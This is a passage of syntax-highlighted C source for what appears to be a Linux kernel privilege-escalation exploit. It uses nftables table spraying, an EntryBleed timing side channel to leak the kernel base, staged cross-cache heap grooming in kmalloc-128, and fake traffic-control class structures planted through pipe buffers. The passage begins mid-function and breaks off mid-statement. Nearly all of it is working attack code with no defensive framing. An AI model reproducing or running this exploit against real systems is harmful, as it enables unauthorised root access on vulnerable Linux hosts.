    <span class="k">struct</span> <span class="n">nftnl_table</span> <span class="o">*</span><span class="n">table</span> <span class="o">=</span> <span class="n">nftnl_table_alloc</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">table</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"nftnl_table_alloc"</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Set table attributes</span>
    <span class="n">nftnl_table_set_u32</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_FAMILY</span><span class="p">,</span> <span class="n">NFPROTO_INET</span><span class="p">);</span>
    <span class="n">nftnl_table_set_str</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_NAME</span><span class="p">,</span> <span class="n">table_name</span><span class="p">);</span>

    <span class="c1">// Build Netlink message for table deletion</span>
    <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">msg_hdr</span> <span class="o">=</span> <span class="n">nftnl_table_nlmsg_build_hdr</span><span class="p">(</span>
        <span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span>
        <span class="n">NFT_MSG_DELTABLE</span><span class="p">,</span>
        <span class="n">NFPROTO_INET</span><span class="p">,</span>
        <span class="n">NLM_F_ACK</span><span class="p">,</span>
        <span class="n">seq</span><span class="o">++</span>
    <span class="p">);</span>

    <span class="c1">// Attach table payload</span>
    <span class="n">nftnl_table_nlmsg_build_payload</span><span class="p">(</span><span class="n">msg_hdr</span><span class="p">,</span> <span class="n">table</span><span class="p">);</span>
    <span class="n">nftnl_table_free</span><span class="p">(</span><span class="n">table</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="c1">// End batch</span>
    <span class="n">nftnl_batch_end</span><span class="p">(</span><span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span> <span class="n">seq</span><span class="o">++</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="c1">// Send the batch</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">mnl_socket_sendto</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="n">mnl_nlmsg_batch_head</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span>
                          <span class="n">mnl_nlmsg_batch_size</span><span class="p">(</span><span class="n">batch</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_sendto"</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">recv_len</span> <span class="o">=</span> <span class="n">mnl_socket_recvfrom</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">recv_len</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_recvfrom"</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">nlh</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nlh</span><span class="o">-&gt;</span><span class="n">nlmsg_type</span> <span class="o">==</span> <span class="n">NLMSG_ERROR</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">struct</span> <span class="n">nlmsgerr</span> <span class="o">*</span><span class="n">err</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nlmsgerr</span> <span class="o">*</span><span class="p">)</span><span class="n">mnl_nlmsg_get_payload</span><span class="p">(</span><span class="n">nlh</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="o">-&gt;</span><span class="n">error</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Netlink error: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="o">-</span><span class="n">err</span><span class="o">-&gt;</span><span class="n">error</span><span class="p">));</span>
                <span class="n">printf</span><span class="p">(</span><span class="s">"Table name was: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">table_name</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Cleanup</span>
    <span class="n">mnl_nlmsg_batch_stop</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>
    <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">spray_tables</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_SPRAY_OBJS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%d"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
        <span class="n">create_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Try to use entry bleed to leak the kernel base</span>
<span class="cp">#define KERNEL_LOWER_BOUND 0xffffffff80000000ULL
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ULL
</span>
<span class="kt">uint64_t</span> <span class="nf">sidechannel</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">addr</span><span class="p">)</span> <span class="p">{</span>
  <span class="kt">uint64_t</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">;</span>
  <span class="n">asm</span> <span class="k">volatile</span> <span class="p">(</span><span class="s">".intel_syntax noprefix;"</span>
    <span class="s">"mfence;"</span>
    <span class="s">"rdtscp;"</span>
    <span class="s">"mov %0, rax;"</span>
    <span class="s">"mov %1, rdx;"</span>
    <span class="s">"xor rax, rax;"</span>
    <span class="s">"lfence;"</span>
    <span class="s">"prefetchnta qword ptr [%4];"</span>
    <span class="s">"prefetcht2 qword ptr [%4];"</span>
    <span class="s">"xor rax, rax;"</span>
    <span class="s">"lfence;"</span>
    <span class="s">"rdtscp;"</span>
    <span class="s">"mov %2, rax;"</span>
    <span class="s">"mov %3, rdx;"</span>
    <span class="s">"mfence;"</span>
    <span class="s">".att_syntax;"</span>
    <span class="o">:</span> <span class="s">"=r"</span> <span class="p">(</span><span class="n">a</span><span class="p">),</span> <span class="s">"=r"</span> <span class="p">(</span><span class="n">b</span><span class="p">),</span> <span class="s">"=r"</span> <span class="p">(</span><span class="n">c</span><span class="p">),</span> <span class="s">"=r"</span> <span class="p">(</span><span class="n">d</span><span class="p">)</span>
    <span class="o">:</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">addr</span><span class="p">)</span>
    <span class="o">:</span> <span class="s">"rax"</span><span class="p">,</span> <span class="s">"rbx"</span><span class="p">,</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"rdx"</span><span class="p">);</span>
  <span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="n">b</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">|</span> <span class="n">a</span><span class="p">;</span>
  <span class="n">c</span> <span class="o">=</span> <span class="p">(</span><span class="n">d</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">|</span> <span class="n">c</span><span class="p">;</span>
  <span class="k">return</span> <span class="n">c</span> <span class="o">-</span> <span class="n">a</span><span class="p">;</span>
<span class="p">}</span>

<span class="cp">#define STEP 0x100000ull
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100
#define ARR_SIZE (KERNEL_UPPER_BOUND - KERNEL_LOWER_BOUND) / STEP
</span>
<span class="kt">uint64_t</span> <span class="nf">leak_syscall_entry</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">scan_start</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">scan_end</span><span class="p">)</span> 
<span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">data</span><span class="p">[</span><span class="n">ARR_SIZE</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span>
    <span class="kt">uint64_t</span> <span class="n">min</span> <span class="o">=</span> <span class="o">~</span><span class="mi">0</span><span class="p">,</span> <span class="n">addr</span> <span class="o">=</span> <span class="o">~</span><span class="mi">0</span><span class="p">;</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">ITERATIONS</span> <span class="o">+</span> <span class="n">DUMMY_ITERATIONS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">idx</span> <span class="o">&lt;</span> <span class="n">ARR_SIZE</span><span class="p">;</span> <span class="n">idx</span><span class="o">++</span><span class="p">)</span> 
        <span class="p">{</span>
            <span class="kt">uint64_t</span> <span class="n">test</span> <span class="o">=</span> <span class="n">scan_start</span> <span class="o">+</span> <span class="n">idx</span> <span class="o">*</span> <span class="n">STEP</span><span class="p">;</span>
            <span class="n">syscall</span><span class="p">(</span><span class="mi">104</span><span class="p">);</span>
            <span class="kt">uint64_t</span> <span class="n">time</span> <span class="o">=</span> <span class="n">sidechannel</span><span class="p">(</span><span class="n">test</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">&gt;=</span> <span class="n">DUMMY_ITERATIONS</span><span class="p">)</span>
                <span class="n">data</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span> <span class="o">+=</span> <span class="n">time</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">ARR_SIZE</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">/=</span> <span class="n">ITERATIONS</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;</span> <span class="n">min</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">min</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
            <span class="n">addr</span> <span class="o">=</span> <span class="n">scan_start</span> <span class="o">+</span> <span class="n">i</span> <span class="o">*</span> <span class="n">STEP</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Setup our class/qdisc hierarchy</span>
<span class="kt">void</span> <span class="nf">setup_classes</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create root qdisc</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Creating root qdisc...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc add dev lo root handle 1:0 drr"</span><span class="p">);</span>

    <span class="c1">// Create class 1:1</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Creating class 1:1...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class add dev lo classid 1:1 drr"</span><span class="p">);</span>

    <span class="c1">// Create class 1:2</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Creating class 1:3...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class add dev lo classid 1:3 drr"</span><span class="p">);</span>

    <span class="c1">// Assign plug qdisc to class 1:1</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Assigning plug qdisc to class 1:1...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024"</span><span class="p">);</span>

    <span class="c1">// Assign pfifo qdisc to class 1:3</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Assigning pfifo qdisc to class 1:3...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc add dev lo parent 1:3 handle 3:0 pfifo"</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Cross cache defines</span>
<span class="cp">#define OBJS_PER_SLAB 32UL  // Number of objects in a kmalloc-128 page
#define CPU_PARTIAL 30UL    // Number of partial pages for kmalloc-128
#define OVERFLOW_FACTOR 4UL // We want to overkill this 
</span>
<span class="c1">// Cross cache globals</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">cc_bucket</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">min</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">max</span><span class="p">;</span>
<span class="p">}</span> <span class="n">cc_bucket_t</span><span class="p">;</span>

<span class="n">cc_bucket_t</span> <span class="n">cc1_bucket</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">cc_bucket_t</span> <span class="n">cc2_bucket</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">cc_bucket_t</span> <span class="n">cc3_bucket</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// Cross-cache stage 1: Spray enough objects that we start getting brand new</span>
<span class="c1">// slab allocations in kmalloc-128 and also reserve enough pages that when</span>
<span class="c1">// they are placed on the partials list they will evict empty pages </span>
<span class="kt">void</span> <span class="nf">cc_1</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Calculate the number of objects to spray</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="p">(</span><span class="n">OBJS_PER_SLAB</span> <span class="o">*</span> <span class="p">(</span><span class="n">CPU_PARTIAL</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="o">*</span> <span class="n">OVERFLOW_FACTOR</span><span class="p">;</span>

    <span class="c1">// Spray the tables</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%d"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
        <span class="n">create_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Update the bucket</span>
    <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">min</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">=</span> <span class="n">spray_amt</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache stage 2: Allocate enough objects that we probably land somewhere</span>
<span class="c1">// in the middle of a new slab (page) so that our object is probably not the </span>
<span class="c1">// exact first or last object on the page</span>
<span class="kt">void</span> <span class="nf">cc_2</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Calculate the number of objects to spray</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Take into account cc1 when spraying</span>
    <span class="kt">uint64_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%ld"</span><span class="p">,</span> <span class="n">i</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
        <span class="n">create_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Update the bucket</span>
    <span class="n">cc2_bucket</span><span class="p">.</span><span class="n">min</span> <span class="o">=</span> <span class="n">offset</span><span class="p">;</span>
    <span class="n">cc2_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">=</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">spray_amt</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache stage 3: Allocate enough objects to complete the victim slab and </span>
<span class="c1">// probably go over onto a new brand new slab</span>
<span class="kt">void</span> <span class="nf">cc_3</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Calculate the number of objects to spray</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">+</span> <span class="mi">2</span><span class="p">;</span> <span class="c1">// Extra one here for class 1:1?</span>

    <span class="c1">// Take into account cc2 when spraying</span>
    <span class="kt">uint64_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">cc2_bucket</span><span class="p">.</span><span class="n">max</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%ld"</span><span class="p">,</span> <span class="n">i</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
        <span class="n">create_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Update the bucket</span>
    <span class="n">cc3_bucket</span><span class="p">.</span><span class="n">min</span> <span class="o">=</span> <span class="n">offset</span><span class="p">;</span>
    <span class="n">cc3_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">=</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">spray_amt</span><span class="p">;</span> 
<span class="p">}</span>

<span class="c1">// Free all of the objects we allocated in steps 2 and 3. This will place these</span>
<span class="c1">// pages on the kmalloc-128 partials list</span>
<span class="kt">void</span> <span class="nf">cc_4</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Calculate the id to start with and the amt to free</span>
    <span class="kt">uint64_t</span> <span class="n">start</span> <span class="o">=</span> <span class="n">cc2_bucket</span><span class="p">.</span><span class="n">min</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">free_amt</span> <span class="o">=</span> <span class="n">cc3_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">-</span> <span class="n">start</span><span class="p">;</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">free_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%ld"</span><span class="p">,</span> <span class="n">i</span> <span class="o">+</span> <span class="n">start</span><span class="p">);</span>
        <span class="n">delete_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Free an object on each of the pages that we allocated in step 1. This will</span>
<span class="c1">// place all of these pages onto the partials list and evict our empty page</span>
<span class="kt">void</span> <span class="nf">cc_5</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Pick the first object to free</span>
    <span class="kt">uint64_t</span> <span class="n">start</span> <span class="o">=</span> <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">min</span><span class="p">;</span>

    <span class="c1">// Establish the max free object</span>
    <span class="kt">uint64_t</span> <span class="n">max</span> <span class="o">=</span> <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">max</span><span class="p">;</span>

    <span class="c1">// Free one object per page </span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="n">start</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">max</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="n">OBJS_PER_SLAB</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%d"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
        <span class="n">delete_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">char</span> <span class="o">*</span><span class="n">required_files</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">"tc.bin"</span><span class="p">,</span>
    <span class="s">"ip.bin"</span><span class="p">,</span>
    <span class="s">"socat.bin"</span><span class="p">,</span>
    <span class="s">"iptables.bin"</span>
<span class="p">};</span>

<span class="kt">size_t</span> <span class="n">num_files</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span>

<span class="kt">int</span> <span class="nf">get_kernel_version</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">utsname</span> <span class="n">buffer</span><span class="p">;</span>
    
    <span class="k">if</span> <span class="p">(</span><span class="n">uname</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buffer</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"uname"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">int</span> <span class="n">major_version</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">sscanf</span><span class="p">(</span><span class="n">buffer</span><span class="p">.</span><span class="n">release</span><span class="p">,</span> <span class="s">"%d"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">major_version</span><span class="p">);</span>

    <span class="k">return</span> <span class="n">major_version</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Fake class data</span>
<span class="kt">uint8_t</span> <span class="n">g_class</span><span class="p">[</span><span class="mi">128</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// Setup the fake class contents in the pipes</span>
<span class="kt">void</span> <span class="nf">setup_fake_class</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set each one up with cyclical pattern for debugging</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_class</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="kt">uint64_t</span> <span class="n">val</span> <span class="o">=</span> <span class="mh">0x4141414141414141</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">128</span> <span class="o">/</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ptr</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">val</span><span class="p">;</span>
        <span class="n">val</span> <span class="o">+=</span> <span class="mh">0x0101010101010101</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Fake &amp;cl-&gt;qdisc, set it to the address of the kernfs buffer + 8 to avoid</span>
    <span class="c1">// a NULL later when we use the address of &amp;qdisc-&gt;gso_skb</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">8</span><span class="p">;</span>

    <span class="c1">// Fake the &amp;cl-&gt;deficit value, set it such that it is always greater than</span>
    <span class="c1">// the "len" returned from qdisc_pkt_len inside of drr_dequeue</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">13</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xFFFFFFFFFFFFFFFF</span><span class="p">;</span>

    <span class="c1">// Fake class data is setup, we can fit 32 on a page. So each pipe gets</span>
    <span class="c1">// 32 fake classes in its backing page. Reset all the pipe buffer contents</span>
    <span class="c1">// to be the fake class</span>
    <span class="kt">char</span> <span class="n">drain</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">PIPE_MAX</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Drain the current pipe</span>
        <span class="n">read</span><span class="p">(</span><span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">PIPE_READ</span><span class="p">],</span> <span class="n">drain</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

        <span class="c1">// Write the class contents to the pipe 32 times</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o">&lt;</span> <span class="mi">32</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
            <span class="kt">ssize_t</span> <span class="n">bytes_written</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
            <span class="k">while</span> <span class="p">(</span><span class="n">bytes_written</span> <span class="o">&lt;</span> <span class="mi">128</span><span class="p">)</span> <span class="p">{</span>
                <span class="kt">ssize_t</span> <span class="n">ret</span> <span class="o">=</span> 
                    <span class="n">write</span><span class="p">(</span>
